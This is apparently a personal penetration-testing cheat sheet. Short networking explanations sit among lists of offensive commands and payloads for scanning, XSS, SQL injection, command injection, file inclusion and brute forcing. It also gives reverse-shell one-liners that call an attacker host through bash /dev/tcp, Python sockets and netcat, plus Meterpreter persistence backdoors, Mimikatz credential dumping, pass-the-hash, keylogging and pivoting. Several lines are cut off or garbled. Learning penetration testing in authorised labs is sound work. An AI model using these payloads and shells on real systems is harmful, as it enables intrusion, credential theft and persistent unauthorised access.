#SCANING
#Types-SCANING
#1-Active Reconnaissance
In this process, you will directly interact with the computer system to gain information. This information can be relevant and accurate. But there is a risk of getting detected if you are planning active reconnaissance without permission. If you are detected, then system admin can take severe action against you and trail your subsequent activities.
#2-Passive Reconnaissance
In this process, you will not be directly connected to a computer system. This process is used to gather essential information without ever interacting with the target systems
#whois

whois site.com

#Ping Sweep
fping -a -g 10.10.10.0/24 2>/dev/null 
nmap -sn 10.10.10.0/24

#Nmap Scans
nmap -sn -iL hostlist.txt
nmap -Pn -o <target>
nmap -sS -sV -sC -O 192.168.8.1/24 or 192.168.8.1
nmap -sT -sS -sV <target>
nmap -p 21.22 or nmap -p-
#OS Detection

nmap -Pn -O 10.10.10.10

#Nmap Scan (Quick)

nmap -sC -sV 10.10.10.10

#Nmap Search Vuln for target
                                                                     
nmap --script nmap-vulners,vulscan -sV
nmap --script vulscan --script-args vulscandb=exploitdb.csv -sV 

#Nmap Scan (Full)

nmap -sC -sV -p- 10.10.10.10

#Nmap Scan (UDP Quick)

nmap -sU -sV 10.10.10.10
#Masscan
masscan -p22,80,23,445 -Pn --rate=800 --banners IP or IP/24 --echo > filename.txt
#Vulnerability-Assessment 
#Nessus
Install Nessus 
or
openvas
or nmap script
#Network
#LAN
#TCP/IP
what tcp/ip=TCP/IP stands for Transmission Control Protocol/Internet Protocol, which is a set of networking protocols that allows two or more compute>
#LAN-Devices
A repeater is a physical layer device used to interconnect the media segments of an extended network. A repeater essentially enables a series of cable segments to be treated as a single cable. Repeaters receive signals from one network segment and amplify, retime, and retransmit those signals to another network segment. These actions prevent signal deterioration caused by long cable lengths and large numbers of connected devices. Repeaters are incapable of performing complex filtering and other traffic processing. In addition, all electrical signals, including electrical disturbances and other errors, are repeated and amplified. The total number of repeaters and network segments that can be connected is limited due to timing and other issues.
A hub is a physical-layer device that connects multiple user stations, each via a dedicated cable. Electrical interconnections are established inside the hub. Hubs are used to create a physical star network while maintaining the logical bus or ring configuration of the LAN. In some respects, a hub functions as a multiport repeater.
A LAN extender is a remote-access multilayer switch that connects to a host router. LAN extenders forward traffic from all the standard network-layer protocols (such as IP, IPX, and AppleTalk), and filter traffic based on the MAC address or network-layer protocol type. LAN extenders scale well because the host router filters out unwanted broadcasts and multicasts. LAN extenders, however, are not capable of segmenting traffic or creating security firewalls.
Bridges analyze incoming frames, make forwarding decisions based on information contained in the frames, and forward the frames toward the destination. In some cases, such as source-route bridging, the entire path to the destination is contained in each frame. In other cases, such as transparent bridging, frames are forwarded one hop at a time toward the destination.
Switches are data link layer devices that, like bridges, enable multiple physical LAN segments to be interconnected into a single larger network. Similar to bridges, switches forward and flood traffic based on MAC addresses. Because switching is performed in hardware instead of in software, however, it is significantly faster. Switches use either store-and-forward switching or cut-through switching when forwarding traffic. Many types of switches exist, including ATM switches, LAN switches, and various types of WAN switches.
Routers perform two basic activities: determining optimal routing paths and transporting information groups (typically called packets) through an internetwork. In the context of the routing process, the latter of these is referred to as switching. Although switching is relatively straightforward, path determination can be very complex
#LAN-Protocols
LAN protocols are distinguished by their capability to efficiently deliver data over shorter distances, such as a few hundred feet, through various mediums, such as copper cabling. Different protocols exist for different purposes and exist in different "layers" of the "Open Systems Interconnect," or OSI, model. Typically when using the word "LAN" to describe a protocol, the intent is to describe lower level, or physical, layers. Some of the most common LAN protocols are "Ethernet," "Token Ring" and "Fiber Distributed Data Interface," or "FDDI."
Video of the Day
Ethernet" is by far the most common type of LAN protocol. It is found in homes and offices throughout the world and is recognizable by its common "CAT5" copper cable medium. It uses a switch or hub to which all systems connect to exchange data.
Token Ring" is an older LAN technology that is not prevalent anymore. The basic premise of "Token Ring" is a single "token" is passed from system to system, or through a hub, and only the intended recipient reads the token.FDDI" 
defines how LAN traffic is transmitted over fiber cabling. Fiber cabling is used when longer distances, usually between floors or buildings, are required, or where heightened security is required.
#Wireless LAN Protocols
Wireless LANs, sometimes referred to as "WLAN" or "Wi-Fi," are becoming increasingly prevalent. They operate essentially the same as a traditional LAN, but use wireless signals between antennas as the medium, rather than cabling. Most of the wireless protocols in use today are based on the 802.11 standard and are differentiated by the letter appearing after the number. The four main protocols are "802.11a," "802.11b," "802.11g" and "802.11n."
802.11a" is designed to carry data over shorter distances at higher speeds of up to 54 megabits per second, or Mbps. "802.11b" does the opposite, operating at lower speeds of up to only 11 Mbps but with higher reliability at longer distances and with more obstructing objects in the environment.
802.11g" combines the best of the previous two protocols, operating at up to 54 Mbps over longer distances. "802.11n" is the latest wireless protocol to be released. It can operate at speeds of greater than 150 Mbps over longer distances than the other protocols
#WAN
#WAN-Devcies
There are specially designed network devices that are used to interconnect LANs. Configuring, installing and maintenance of this devices requires expert skills by skilled technicians for the management of the organization’s network. These devices are specific to WAN environment, and they are:
ModemsModems enables digital data to be sent over an analog medium during transmission and receiving of informationA voice band modem converts the digital signals produced by a computer – the 1s and 0s- into voice frequencies that can be transmitted over the analog lines of the telephone network. On the other side of the connection, another modem converts the sounds back into a digital signal for input to a computer or network connectionCSU/DSUChannel Service Unit / Data Service Unit CSU/DSU are combined piece of equipment used for monitoring clocking and frame synchronization on a line. It also performs error detection at the physical layer, It could be called a Modem sort of.
Access serverConcentrates dial-in and dial-out user communications. An access server may have a mixture of analog and digital interfaces and support hundreds of simultaneous users.
WAN SwitchA multi-port internetworking device used in carrier networks. These devices typically switch traffic such as ATM, and operate at the Data Link layer of the OSI reference model. Public switched telephone network switches may also be used within the cloud for circuit-switched connections like Integrated Services Digital Network (ISDN) or analog dial-up.RouterA Router Provides internetworking between the LANs, and WAN access interface ports that are used to connect to the service provider network. These interfaces may be serial connections or other WAN interfaces. With some types of WAN interfaces, an external device such as a DSU/CSU or modem (Analogue, Cable, or DSL) is required to connect the router to the local point of presence (POP) of the service provider.
Core RouterA router that resides within the middle or backbone of the WAN rather than at its periphery. To fulfill this role, a router must be able to support multiple telecommunications interfaces of the highest speed in use in the WAN core, and it must have the ability to forward IP packets at full speed on all of those interfaces. The router must also support the routing protocols being used in the coreCabling Network DevicesHow to Cable LANs and WANs
#WAN-Protocols
WAN protocols are distinguished by their capability to efficiently deliver data over longer distances, such as hundreds of miles. This is generally required to bridge data between multiple LANs. The Internet is the world's largest WAN. Routers, modems and other WAN devices are used to transmit the data over various mediums, commonly fiber cabling. Some of the most common WAN protocols in use today are "Frame Relay," "X.25," "Integrated Services Digital Network," or "ISDN," and "Point-to-Point Protocol," or "PPP."
Frame Relay" and "X.25" are similar in that they are both packet-switching technologies for sending data over large distances. "Frame Relay" is newer and faster, whereas "X.25" delivers data more reliably.
PPP" is a protocol that is used to transmit data for other protocols over mediums that they would not normally support, such as sending the "Internet Protocol," or IP, over serial lines.
ISDN" is a method of combining multiple dial-up lines on a public telephone network into a single data stream.

#Web Applications

The following commands could be useful when enumerating and attacking web applications. Again, make sure you understand what each one does rather than blindly throwing them at the machine in question.
#Banner Grabbing

nc -v 10.10.10.10 port HEAD / HTTP/1.0

#OpenSSL for HTTPS services

openssl s_client -connect 10.10.10.10:443 HEAD / HTTP/1.0

#Httprint

httprint -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt
#httrack
httrack http://192.168.8.1/html/home.html -O /var/www/html/
#Nikto
nikto for http: nikto -h
nikto for https: nikto -h -ssl
#WMAP
msf6 > load wmap
wmap_sites -a http://192.168.8.111/dvwa/index.php
wmap_targets -t http://192.168.8.111/dvwa/index.php
wmap_run -t
wmap_run -e
wmap_vulns -l
vulns
#HTTP
What HTTP=he Hypertext Transfer Protocol (HTTP) is the foundation of the World Wide Web, and is used to load web pages using hypertext links. HTTP is>
what http request=An HTTP request is the way internet communications platforms such as web browsers ask for the information they need to load a websi>
what HTTP method=What’s an HTTP method?An HTTP method, sometimes referred to as an HTTP verb, indicates the action that the HTTP request expects from the queried server. For example, two of the most common HTTP methods are ‘GET’ and ‘POST’; a ‘GET’ request expects information back in return (usually in the form of a website), while a ‘POST’ request typically indicates that the client is submitting information to the web server (such as form information, e.g. a submitted username and password
what HTTP request headers=HTTP headers contain text information stored in key-value pairs, and they are included in every HTTP request (and response, more on that later). These headers communicate core information, such as what browser the client is using what data is being requested.
what HTTP request body=The body of a request is the part that contains the ‘body’ of information the request is transferring. The body of an HTTP request contains any information being submitted to the web server, such as a username and password, or any other data entered into a form.
what HTTP response=An HTTP response is what web clients (often browsers) receive from an Internet server in answer to an HTTP request. These responses communicate valuable information based on what was asked for in the HTTP request
what HTTP response headers=Much like an HTTP request, an HTTP response comes with headers that convey important information such as the language and format of the data being sent in the response body
what HTTP response body=Successful HTTP responses to ‘GET’ requests generally have a body which contains the requested information. In most web requests, this is HTML data which a web browser will translate into a web page

GET, POST, HEAD, PUT, DELETE, OPTIONS

Use the OPTIONS verb to see what other verbs are available


You can use HTTP verbs to upload a php shell. Find the content length, then use PUT to upload the shell. Make sure you include the size of the payload when using the PUT command.

wc -m shell.php x shell.php PUT /shell.php Content-type: text/html Content-length: x
python-server=python2 SimpleHTTPServer 8080
#Directory and File Scanning

My preferred tool at the moment is dirsearch, I find it to to be fast and easy to use. For a more in depth scan, use gobuster and include a large wordlist.

ffuf -w WORD-LIST -u example.com -c -v
dirsearch.py -u http://10.10.10.10 -e  
gobuster -u 10.10.10.10 -w /path/to/wordlist.txt
gobuster dir -u MACHINE_IP -w WORDLIST_PATH
sublist3r -d exmple.com
amass -ip -d example.com
dirb exmple.com  
dirb http://url/ path/for/word/list.txt
dirb http://example.com -u "admin:password"
dirb http://example.com -p proxy "example" http://127.0.0.1:8080 
dirbuster
Use https://dnsdumster.com
#NetCat
nc -lvp 4444 
nc -lvp 4444 -e /bin/bash
nc 192.168.8.1 4444
nc 10.10.10.10 80
#target#                   #attacker#
nc -l -p 1234 > file.txt | nc -w 4 <target-IP> 1234 < file.txt
#Rlogin
rlogin -l root 192.168.8.129
#Advanced Google Searches

Not really necessary, but useful to know all the same.

site: intitle: inurl: filetype: AND, OR, &, |, -

#Cross Site Scripting (XSS)

The general steps I use to find and test XSS are as follows:

1. Find a reflection point 2. Test with <i> tag 3. Test with HTML/JavaScript code (alert('XSS'))

#Reflected XSS = Payload is carried inside the request the victim sends to the website. Typically the link contains the malicious payload
http://victim.site/search.php?find=<payload>
################################################################
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'">><marquee><h1>XSS</h1></marquee>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
<script>var var = 1; alert(var)</script 
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
" onfocus=alert(document.domain) "> <"
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
<br size=\"&{alert('XSS')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert())>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(123)</script>
<body onLoad="while(true) alert('XSS');">
'"></title><script>alert(1111)</script>
<script>alert(document.cookie)</script>
' onerror='alert(1)'
<i>test string
<i>hello!</i>
<h1>XSS</h1>
<img src=x onerror=alert(1)> confirm('safa')
<img src=x onerror=alert( prompt
<script>alert('XSS')</script>
##################################################
#Persistent XSS = Payload remains in the site that multiple users can fall victim to. Typically embedded via a form or forum post
#DOM-based XSS = where the vulnerability is in the client-side code rather than the server-side code
the bast tool For Scan Web XSS
#xsser
xsser --gtk
#Sql-Injection
#SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).[1] SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database
###########################################
#Types-SqlInjection
###########################################
#In-band SQL Injection= is the most common and easy-to-exploit of SQL Injection attacks. In-band SQL Injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results
#Error-based SQLi= is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database. While errors are very useful during the development phase of a web application, they should be disabled on a live site, or logged to a file with restricted access instead
#Union-based SQLi= is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response
#Inferential SQL Injection= unlike in-band SQLi, may take longer for an attacker to exploit, however, it is just as dangerous as any other form of SQL Injection. In an inferential SQLi attack, no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band (which is why such attacks are commonly referred to as “blind SQL Injection attacks”). Instead, an attacker is able to reconstruct the database structure by sending payloads, observing the web application’s response and the resulting behavior of the database server
#Boolean-based SQL Injection= is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result
#Time-based SQL Injection= is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE
#Out-of-band SQL Injection= is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL Injection occurs when an attacker is unable to use the same channel to launch the attack and gather results
#####################End####################
#Locate Sql Injection
the url az not vuln
http://www.example.com/section.php?id=51
http://www.example.com/section.php?id=51'
http://www.example.com/section.php?id=51/
#We just added a single quote in the parameter. If this url throws an error or reacts in an unexpected manner then it is clear that the database has got the unexpected single quote which the application did not escape properly. So in this case this input parameter "id" is vulnerable to sql injection.#
SCAN-WEBAPP-For-Sql-Injectin
##########################################
' or 1=1;--
' or 1=1; -- -
or '1'='1
'1'='1'--
‫*‪/‬‬
‫‪#‬‬
‫)‬
‫(‬
‫')‬
‫'(‬
‫‪and 1=1‬‬
‫‪and 1=2‬‬
‫‪and 1>2‬‬
‫‪and 1<=2‬‬
‫‪+and+1=1‬‬
‫‪+and+1=2‬‬
‫‪+and+1>2‬‬
‫‪+and+1<=2‬‬
‫‪/**/and/**/1=1‬‬
‫‪/**/and/**/1=2‬‬
‫‪/**/and/**/1>2‬‬
‫‪/**/and/**/1<=2‬‬
‫‪/**/or/**/1/**/=/**/1‬‬
‫‪/**/or/**/1/**/=/**/2‬‬
‫‪/**/or/**/1/**/>/**/2‬‬
‫‪/**/or/**/1/**/<=/**/2‬‬
‫‪and 50=50‬‬
‫‪and 50=52‬‬
‫‪and 50>52‬‬
‫‪and 50<=52‬‬
‫‪+and+50=50‬‬
‫‪+and+50=52‬‬
‫‪+and+50>52‬‬
‫‪+and+50<=52‬‬
#################################################
Tool For Hacking Sqli
#SQLMap
#Scan with Sqlmap
sqlmap -u "http://www.example.com/section.php?id=51"
#EXPLOIT-with-SQlMAP
sqlmap -u "http://example.com/page.php?id=5" --random-agent
sqlmap -u http://10.10.10.10 -p id (example) --technique=U
sqlmap -r req.txt --random-agent --batch
sqlmap -u http://10.10.10.10  --data POSTstring -p parameter 
sqlmap -u http://10.10.10.10 --os-shell 
sqlmap -u http://10.10.10.10 --dump
sqlmap -u http://10.10.10.10 --data=<POST> -p parameter 
sqlmap -u http://10.10.10.10 --dbs 
sqlmap -u http://10.10.10.10 --tables
sqlmap -u http://10.10.10.10 -D name database --tables
sqlmap -u http://10.10.10.10 -D name database -T table name --columns
sqlmap -u http://10.10.10.10 -D name database -T table name -C columns name
sqlmap -u http://10.10.10.10 -D name database -T table name -C columns name --dump
#Command-Injection
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
This attack differs from Code Injection, in that code injection allows the attacker to add their own code that is then executed by the application. In Command Injection, the attacker extends the default functionality of the application, which execute system commands, without the necessity of injecting code
#Types-Command-Injection
#Error based injection: When an attacker injects a command through an input parameter and the output of that command is displayed on the certain web page, it proves that the application is vulnerable to the command injection. The displayed result might be in the form of an error or the actual outcomes of the command that you tried to run. An attacker then modifies and adds additional commands depending on the shell the webserver and assembles information from the application
#Blind based Injection: The results of the commands that you inject will not be displayed to the attacker and no error messages are returned. The attacker might use another technique to identify whether the command was really executed on the server or not
The OS Command Injection vulnerability is one of the top 10 OWASP vulnerabilities. Therefore let’s have a look onto its impact
Tool For Command Injection #commix or Metasploit Module
SCAN-WEBAPP-For-Command-Injection
########################################################
echo%20AGIYMZ$((69%2B52))$(echo%20AGIYMZ)AGIYMZ
%20echo%20TDJHRY$((30%2B41))$(echo%20TDJHRY)TDJHRY
;echo%20MPCSBG$((54%2B42))$(echo%20MPCSBG)MPCSBG
&echo%20NWMZCF$((57%2B72))$(echo%20NWMZCF)NWMZCF
|echo%20TJEGSE$((27%2B57))$(echo%20TJEGSE)TJEGSE
||echo%20ANSBHE$((26%2B89))$(echo%20ANSBHE)ANSBHE
&&echo%20PVJXOS$((12%2B1))$(echo%20PVJXOS)PVJXOS
%0aecho%20VVIEOJ$((30%2B78))$(echo%20VVIEOJ)VVIEOJ
%3Becho%20SRPJET$((29%2B34))$(echo%20SRPJET)SRPJET
%26echo%20NQPWBV$((16%2B77))$(echo%20NQPWBV)NQPWBV
%26%26echo%20QOZRFB$((19%2B4))$(echo%20QOZRFB)QOZRFB
%7Cecho%20IRODNG$((26%2B68))$(echo%20IRODNG)IRODNG
%7C%7Cecho%20KRCSNE$((57%2B75))$(echo%20KRCSNE)KRCSNE
echo%20IFNPXI$((40%2B99))$(echo%20IFNPXI)IFNPXI'
%20echo%20HBFEEM$((46%2B2))$(echo%20HBFEEM)HBFEEM'
;echo%20KHMFRS$((69%2B67))$(echo%20KHMFRS)KHMFRS'
&echo%20DACXMN$((57%2B35))$(echo%20DACXMN)DACXMN'
|echo%20DDLJJW$((33%2B23))$(echo%20DDLJJW)DDLJJW'
||echo%20XIYAUA$((17%2B90))$(echo%20XIYAUA)XIYAUA'
&&echo%20CMMOTV$((30%2B10))$(echo%20CMMOTV)CMMOTV'
%0aecho%20VKWHEH$((83%2B36))$(echo%20VKWHEH)VKWHEH'
%3Becho%20RDKWWC$((22%2B44))$(echo%20RDKWWC)RDKWWC'
%26echo%20VOANQN$((77%2B86))$(echo%20VOANQN)VOANQN'
%26%26echo%20EXUMZL$((4%2B99))$(echo%20EXUMZL)EXUMZL'
%7Cecho%20VDZSYZ$((58%2B1))$(echo%20VDZSYZ)VDZSYZ'
%7C%7Cecho%20HYHREQ$((78%2B11))$(echo%20HYHREQ)HYHREQ'
echo%20GHWFXG$((12%2B72))$(echo%20GHWFXG)GHWFXG"
%20echo%20BAJXZZ$((73%2B7))$(echo%20BAJXZZ)BAJXZZ"
;echo%20YRBNTY$((83%2B14))$(echo%20YRBNTY)YRBNTY"
&echo%20WQLTXV$((0%2B25))$(echo%20WQLTXV)WQLTXV"
########################################################
use exploit/multi/script/web_delivery
#Commix
commix --url="http://192.168.8.130/commandexec/example1.php?ip="
#File inclusion
#File-Inclusion=file inclusion vulnerability is a type of web vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time. A file include vulnerability is distinct from a generic directory traversal attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file inclusion vulnerability will result in remote code execution on the web server that runs the affected web application. An attacker can use remote code execution to create a web shell on the web server, which can be used for website defacement
#Types-Inclusion
RFI=Remote file inclusion Remote file inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application
LFI=Local file inclusion (LFI) is similar to a remote file inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included for execution. This issue can still lead to remote code execution by including a file that contains attacker-controlled data such as the web server's access logs
#SCAN-WEBAPP-For-File-inclusion-manaul
http://fake_site/vulnerable.php?language=
#Windows-Server#
################
C:/Users/Administrator/NTUser.dat
C:/Documents and Settings/Administrator/NTUser.dat
C:/apache/logs/access.log
C:/apache/logs/error.log
C:/apache/php/php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/php4/php.ini
C:/php5/php.ini
C:/php/php.ini
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
#######################################################
#Linux-Server#
##############
/etc/passwd
/etc/shadow
/etc/aliases
/etc/anacrontab
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/at.allow
/etc/at.deny
/etc/bashrc
/etc/bootptab
/etc/chrootUsers
/etc/chttp.conf
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/cups/cupsd.conf
/etc/exports
/etc/fstab
/etc/ftpaccess
/etc/ftpchroot
/etc/ftphosts
/etc/groups
/etc/grub.conf
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/httpd/access.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/access_log
###############################
#System Attacks

The other type of ‘attack’ you will be doing are system attacks. Make sure you understand why/how to brute force types of services and hashes, as well as basic metasploit usage.

#Password Attacks
#John the 
unshadow passwd shadow > unshadow
john -wordlist /path/to/wordlist -users=users.txt hashfile
john -wordlist=(wordlist) (filecrack)
john shadow --wordlist
john --format=netlm file-to-ntlm 
#Brute Forcing with Hydra
replace ‘ssh’ with any relevant service
#########################################################
hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22 
hydra -L users.txt -P pass.txt telnet://10.10.10.10
hydra -U rdp or ftp or telnet or ssh all service
hydra -L user.txt -P pass.txt telnet://192.168.8.1
hydra  -l user -p pass telnet://192.168.8.1
hydra -l admin -p password ftp://localhost/
hydra -L default_logins.txt -p test ftp://localhost/
hydra -l admin -P common_passwords.txt ftp://localhost/
hydra -L logins.txt -P passwords.txt ftp://localhost/
#Ncrack
ncrack telnet://192.168.8.100:25
ncrack telnet://192.168.8.100
ncrack ssh://192.168.8.100:1500
ncrack ssh://192.168.8.100
#Medusa
medusa -h 192.168.8.1 -M telnet -U username.txt -P passowrd.txt
medusa -h 192.168.8.1 -M ssh -U username.txt -P passowrd.txt
medusa -M ftp -q
#Network Attacks
#Windows Shares Using Null sessions
nmblookup -A 
smbclient -L //IP -N
smbclient //IP/C$ -N (-N is no password)
smbclient  //192.168.8.110/C (is password)
smbclient \\\\192.168.1.10\\c$ -N -U ""
enum -s IP
smbmap -H 
enum -p IP
--script=nfs-ls,nfs-statfs,nfs-showmount
--script=smb-brute
--script=smb-enum-shares.nse,smb-enum-users.nse
#rpcclient
enum
#Enum4Linux
enum4linux -a 
enum4linux -a -v
enum4linux -n 
enum4linux -P
enum4linux -S
enum4linux -s /usr/share/enum4linux/share-list.txt
the bast option is -a
#Impacket tool
samrdump.py IP

#ARP spoofing

echo 1 > /proc/sys/net/ipv4/ip_forward 
arpspoof -i wlan0 -t (target ip) -r (router ip)
open wireshark
#Reverse-Shells
###########################################################################
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con
nect(("<attacker_IP>",<attacker_PORT>));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-
i"]);'
###########################################################################
bash -i >& /dev/tcp/<attacker_IP>/<attacker_PORT> 0>&1
###########################################################################
php -r ‘$sock=fsockopen(“<attacker_IP>”,<attacker_PORT>); exec(“/bin/sh -I
<&3 >&3 2>&3”);’
###########################################################################
telnet <attacker_IP> 4444 | /bin/bash | telnet <attacker_IP> 4445
###########################################################################
nc <attacker_IP> <attacker_PORT> -e /bin/sh
###########################################################################
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -I 2>&1 | nc <attacker_IP>
<attacker_PORT> > /tmp/f
###########################################################################
#Metasploit

Metasploit is a very useful tool for penetration testers, and I’d recommend going through a Metasploitable for an effective, hands on way to learn about Metasploit.

Basic Metasploit Commands

search x use x info show options, show advanced options SET X (e.g. set RHOST 10.10.10.10, set payload x)

#Meterpreter

The below are some handy commands for use with a Meterpreter session. Again, I’d recommend going through a Metasploitable or doing some extra study here.

background sessions -l sessions -i 1 sysinfo, ifconfig,run metsvc route, getuid getsystem (privesc) bypassuac download x /root/ upload x C:\\Windows shell use post/windows/gather/hashdump
#POST-EXPLOITION
#BACKDOOR
run persistence -A -X -i 5 -p 4444 -r 192.168.8.1
post/windows/manage/sshkey_persistence
post/linux/manage/sshkey_persistence
#PASS-THE-HASH
#Mimikatz
privilege::debug
sekurlsa::logonpasswords
#RDP
xfreerdp /u:user /d:domain /pth:hash
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#Upgrade-Shell
python -c 'import pty;pty.spawn("/bin/bash")'
perl -e 'exec "/bin/sh";'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
#Privilege-Escalation
#Incognito
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate 
#enumeration-tools
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/
show tools for root 
automatic enumeration-tools
https://github.com/rebootuser/LinEnum
for Linux and Windows
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
#ENUM-Windows/Linux
##############
SYSTEM-ENUM
##############
systeminfo 
hostname
wmic qfe
##LINUX##
hostname
uname -a
cat /proc/version
hostname -f
cat /etc/issue
ifconfig
dpkg -l
cat /etc/mysql/my.cnf
cat /etc/crontab
ls -als /etc/cron.*
lsmod
##############
USER-ENUM
##############
whoami
whoami /priv
whoami /groups
##LINUX##
find / -user username
for user in $(cat /etc/passwd |cut -f1 -d":"); do id $user; done
last -a
lsof
find /* -name *.*history* -print 2> /dev/null
cat /etc/sudoers
ls -als /root/*
ls -als /home/*
cat /etc/passwd |cut -f1,3,4 -d":" |grep "0:0" |cut -f1 -d":" |awk '{print $1}'
sudo -p
find / -perm 4000 -type f 2>/dev/null
grep "password" /etc*.conf 2> /dev/null
cat /etc/shadow
ls -als /root
touch /var/www/html
grep $USER /etc/passwd
grep $USER /etc/passwd | cut -f6 -d”:”
cat /etc/group
find / -name password*.txt 2> /dev/null
find / -perm -u=s -type f 2>/dev/null
##############
NETWORK-ENUM
##############
ipconfig
arp -a
netstat -ano
netstat -tulpn 
net share
##LINUX##
netstat -tunp
route -n
cat /etc/NetworkManager/system-connections/* |grep -E “^id|^psk”
cat /home/*/.ssh/id*
cat /etc/samba/smb.conf
cat /etc/resolv.conf
arp -a
netstat -auntp
route -n
ip ro show
watch ss -twurp
ip xfrm state list
iptables -L -n
####run-the-all########
meterpreter > run post/windows/gather/enum_chrome
meterpreter > run winenum
##############
#KeyLogger
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > run keylogrecorder -c 0 
#Pivoting
Pivoting is a technique that Metasploit uses to route the traffic from a hacked computer toward other networks that are not accessible by a hacker machine
#How
ipcofnig or netstat -anu or route list or arp
run arp_scanner 192.168.8.0/24
run post/multi/gather/ping_sweep rhosts=192.168.8.0/24
run autoroute -s 192.168.8.0/24
run autoroute -p
use auxiliary/scanner/portscan/tcp
(auxiliary/scanner/portscan/tcp) > set rhosts 192.168.8.0/24
(auxiliary/scanner/portscan/tcp) > set threads 10
(auxiliary/scanner/portscan/tcp) > use auxiliary/server/socks4a
(auxiliary/server/socks4a) > set srvhost 127.0.0.1
(auxiliary/server/socks4a) > run
#now go to file /etc/proxychains.conf
down
add socks4 127.0.0.1 1080
proxychains nmap -sV target router/24
#MySQL
hydra -l admin -p test123 mssql://172.16.33.33
#Msfconsole
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set username xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set password xxx
msf5 auxiliary(scanner/mssql/mssql_login) > run
#################################################################
